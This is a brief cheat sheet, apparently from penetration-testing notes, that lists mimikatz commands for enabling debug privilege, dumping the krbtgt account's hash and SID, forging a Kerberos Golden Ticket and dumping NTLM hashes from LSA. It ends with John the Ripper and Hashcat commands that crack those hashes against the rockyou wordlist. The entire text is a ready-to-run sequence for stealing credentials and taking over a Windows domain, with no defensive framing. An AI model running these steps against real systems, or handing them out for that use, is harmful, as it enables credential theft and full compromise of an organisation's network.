> . .\mimikatz.exe
privilege::debug [privilege "20" ok]
. Dump the hash and security identifier of the Kerberos Ticket Granting Ticket account
> lsadump::lsa /inject /name:krbtgt
. Create a Golden Ticket
> kerberos::golden /user: /domain: /sid: /krbtgt: /id:
. Dump NTLM hashes
> lsadump::lsa /patch
. Cracking NTLM hash with John the Ripper and Hashcat
> john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
> hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt